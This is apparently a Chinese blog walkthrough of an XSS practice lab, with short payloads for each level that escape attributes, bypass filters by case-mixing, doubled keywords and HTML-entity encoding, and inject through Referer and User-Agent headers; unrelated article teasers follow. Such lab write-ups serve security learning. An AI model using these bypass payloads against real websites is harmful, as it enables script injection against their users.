XSS学习(绕过)

学习平台:xss.tesla-space.com
在这里插入图片描述

XSS学习(绕过)

  • level1
  • level2
  • level4
  • level5
  • level6
  • level7
  • level8
  • level9
  • level10
  • level11
  • level12

level1

在这里插入图片描述应该没有过滤
https://xss.tesla-space.com/level1.php?name=<script>alert(1);</script>

level2

先试一下<script>alert(1);</script>
在这里插入图片描述需要闭合
' "><script>alert(1);</script>
在这里插入图片描述# level3

先试一下' "><script>alert(1);</script>
在这里插入图片描述不行,多试一下,发现单引号没转义
在这里插入图片描述可以用onfocus
在这里插入图片描述发现在最右边加了个单引号,因此需要在alert左边加一个单引号闭合
'onfocus='alert(1)
在这里插入图片描述

level4

找一些常用的试一下发现把<>删了
在这里插入图片描述发现和level3比,本题用"闭合"onfocus="alert(1)
在这里插入图片描述

level5

试了一下发现改了script,而且需要闭合前面的value
在这里插入图片描述
试一下大小写绕过,发现不行
在这里插入图片描述不用srcipt,改用a' "><a href="javascript:alert()">aa</a>

在这里插入图片描述

level6

把level5的答案输入,发现herf也被禁用了
在这里插入图片描述' "><sCripT>alert(1);</sCripT>大小写绕过居然可以了

level7

输入level6的答案,发现把script删除了
在这里插入图片描述
明显的双写绕过' "><sCrsCripTipT>alert(1);</sCsCripTripT>

在这里插入图片描述

level8

应该是要构造herf内容,发现直接输入javascript不行,大小写也不行
在这里插入图片描述可以对javasricpt进行编码,&#x6a;&#x61;&#x76;&#x61;&#x73;&#x63;&#x72;&#x69;&#x70;&#x74;:alert()">
在这里插入图片描述

在这里插入图片描述

level9

用上题的答案输入提示不合法
在这里插入图片描述猜测需要包含http之类的一个正常网站
在这里插入图片描述发现这种链接点击后是没用的,需要把这个正常网站用/**/注释掉,&#x6a;&#x61;&#x76;&#x61;&#x73;&#x63;&#x72;&#x69;&#x70;&#x74;:alert();/*http://www.baidu.com*/

在这里插入图片描述

level10

发现有三个隐藏的input
在这里插入图片描述对这三个变量赋值,看看哪个能生效,看来只有t_sort有用
在这里插入图片描述input中的onfocus之前遇到过,这题特殊的地方在于input属性是隐藏的,可以在输入里重新给type赋值https://xss.tesla-space.com/level10.php?t_link=111&t_history=222&t_sort="onfocus="alert(1)" type=button

在这里插入图片描述

level11

试了t_sort发现不行,注意到t_ref是第十关的有关信息,可以抓个包
在这里插入图片描述一步一步更改referer字段
在这里插入图片描述

level12

12获取的应该是11User-Anget的值
在这里插入图片描述在此处注入
在这里插入图片描述

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:/a/718198.html

如若内容造成侵权/违法违规/事实不符,请联系我们进行投诉反馈qq邮箱809451989@qq.com,一经查实,立即删除!

相关文章

修改以太网卡mac地址

原生以太网卡与PCIe以太网卡 以Intel 原生以太网卡与PCIe以太网卡为例&#xff1a; Intel原生以太网卡和PCIe以太网卡在系统中实现网络连接时&#xff0c;涉及到与系统总线&#xff08;如PCIe总线&#xff09;的连接方式和性能差异。 Intel 原生以太网卡 定义&#xff1a;所…

大模型应用开发技术:Multi-Agent框架流程、源码及案例实战(一)

LlaMA 3 系列博客 基于 LlaMA 3 LangGraph 在windows本地部署大模型 &#xff08;一&#xff09; 基于 LlaMA 3 LangGraph 在windows本地部署大模型 &#xff08;二&#xff09; 基于 LlaMA 3 LangGraph 在windows本地部署大模型 &#xff08;三&#xff09; 基于 LlaMA…

celery使用 Zookeeper 或 kafka 作为broker,使用 mysql 作为 backend

背景介绍: 先贴上celery官方文档:Celery - Distributed Task Queue — Celery 5.4.0 documentation xxx项目中单点环境运行celery + redis,使用流畅,不做过多介绍。 切换高可用环境时,客户redis使用的是cluster集群,官方文档中并没有对redis cluster的支持,查看githu…

视频合成渲染服务解决方案,数字人+PPT+视频云剪辑

在金融理财领域&#xff0c;一个生动、直观、专业的视频&#xff0c;往往能够在海量信息中脱颖而出&#xff0c;帮助客户更好地理解产品、把握市场动态。然而&#xff0c;传统的视频制作方式往往周期长、成本高、难以适应快速变化的市场需求。 美摄科技&#xff0c;作为行业领…

eclipse maven打包报错: 致命错误: 在类路径或引导类路径中找不到程序包 java.lang的解决

还是上来帖张图&#xff1a; 1、系统之前是运行在mac上的&#xff0c;打包一切正常&#xff0c;但是现在在win11的eclipse打包就报错了。 2、致命错误: 在类路径或引导类路径中找不到程序包 java.lang&#xff0c;上面的问题应该是找不到java中的jar中的class导致。 解决&…

python安装目录文件说明----Dlls文件夹

在Python的安装目录下&#xff0c;通常会有一个DLLs文件夹&#xff0c;它是Python标准库的一部分。这个文件夹包含了一些动态链接库&#xff08;Dynamic Link Libraries&#xff0c;DLL&#xff09;&#xff0c;这些库提供了Python解释器和标准库的一些关键功能。以下是对这个文…

JAVA面试(六)

缓存 MemcachedredisRedis常见数据类型和使用Redis缓存持久化RDB-快照AOF-追加文件 Redis数据过期机制惰性删除定期删除 Redis缓存淘汰策略&#xff08;8种&#xff09;算法LRU &#xff08;Least Recently Used&#xff09;&#xff1a;最近最少使用LFU&#xff08;Least Freq…

宕机了, redis如何保证数据不丢?

前言 如果有人问你&#xff1a;"你会把 Redis 用在什么业务场景下&#xff1f;" 我想你大概率会说&#xff1a;"我会把它当作缓存使用&#xff0c;因为它把后端数据库中的数据存储在内存中&#xff0c;然后直接从内存中读取数据&#xff0c;响应速度会非常快。…

手机录屏怎么操作?3个小技巧,轻松录屏

在数字化时代&#xff0c;手机录屏功能已逐渐成为我们日常生活和工作中不可或缺的工具。无论是为了记录游戏过程、制作教程&#xff0c;还是为了留存重要的视频通话&#xff0c;手机录屏都能发挥巨大的作用。本文将详细介绍手机录屏的3个功能、录屏小技巧等&#xff0c;帮助您更…

【Qt】chartView设置橡皮筋效果(RubberBand)

1. 效果 2. 代码 QChartView* chartView new QChartView();chartView->setRubberBand(QChartView::RectangleRubberBand);

大模型应用开发技术:Multi-Agent框架流程、源码及案例实战(二)

LlaMA 3 系列博客 基于 LlaMA 3 LangGraph 在windows本地部署大模型 &#xff08;一&#xff09; 基于 LlaMA 3 LangGraph 在windows本地部署大模型 &#xff08;二&#xff09; 基于 LlaMA 3 LangGraph 在windows本地部署大模型 &#xff08;三&#xff09; 基于 LlaMA…

Mac 开发vscode常用命令

1 打开vscode settting配置 commandshiftp 输入&#xff1a;Open User Setting 2

短信群发平台众多,如何挑选一家靠谱的合作伙伴?

随着通信技术的不断发展和智能手机的普及&#xff0c;短信群发平台在企业营销、客户通知、活动推广等领域的应用越来越广泛。然而&#xff0c;市场上的短信群发平台琳琅满目&#xff0c;如何从中挑选出一家靠谱、高效、安全的合作伙伴&#xff0c;成为了许多企业和个人关注的焦…

两台电脑如何建立局域网?三种简便方法推荐

方法一&#xff1a;使用网线直接连接 1、准备一根网线&#xff0c;长度不宜过长&#xff08;建议不要超过80米&#xff0c;否则信号会衰减&#xff09;&#xff0c;确保两台电脑相邻或距离较近。 2、将网线的一头插入一台电脑的网口&#xff0c;另一头插入另一台电脑的网口。 …

算法基础精选题单 模拟 (个人题解)

前言&#xff1a; 从今天开始刷牛客上的这份题单&#xff0c;为暑假的牛客多校集训做准备&#xff0c;题单上一共有237道题&#xff0c;要想在集训开始前刷完难度还是很大的&#xff0c;但我一定会坚持下来&#xff0c;希望在这段时间内我能真正入门算法竞赛。接下来这三道题都…

机械臂抓取物体整体的开发流程

开发一个机械臂抓取物体的系统涉及多个步骤和不同领域的知识&#xff0c;包括机械设计、控制系统、传感器集成、软件开发等。以下是一个全面的开发流程概述&#xff1a; 1. 需求分析与系统设计 需求分析&#xff1a; 明确机械臂需要抓取的物体类型&#xff08;大小、重量、材…

实用技巧,用lsof命令监控tar文件解压进度,简单有效!

在Linux系统中&#xff0c;tar命令是一个非常常用的工具&#xff0c;用于创建和解压缩归档文件。尽管tar命令本身没有提供直接查看解压进度的功能&#xff0c;但我们可以借助lsof&#xff08;List Open Files&#xff09;命令来间接监控解压进度。本文将详细介绍如何使用lsof命…

Drake 机器人仿真

sudo apt-get install&#xff0c;pip3 install&#xff0c;sudo apt install这些命令是在Linux系统中用于安装软件包或Python库的不同方法&#xff0c;它们分别属于不同的包管理系统和工具。 sudo apt-get install&#xff1a; 这是在Debian、Ubuntu等基于Debian的系统上用于从…

Android Studio 2024.1.1(Koloa)版本 Profiler 工具变动

在 Android Studio 2024.1.1 (Koloa) 版本当中&#xff0c;Profiler 工具终于迎来了重大 UI 更新&#xff08;太感动了&#xff0c;因为之前的 Profiler 工具连接得慢&#xff0c;收集 Trace 信息还很卡&#xff0c;步骤繁琐等&#xff0c;这次更新有了很大的优化&#xff09; …

低代码组件扩展方案在复杂业务场景下的设计与实践

组件是爱速搭的前端页面可视化模块的核心能力之一&#xff0c;它将前端研发人员从无休止的页面样式微调和分辨率兼容工作中解放了出来。 目前&#xff0c;爱速搭通过内置的上百种功能组件&#xff08;120&#xff09;&#xff0c;基本可以覆盖大部分中后台页面的可视化设计场景…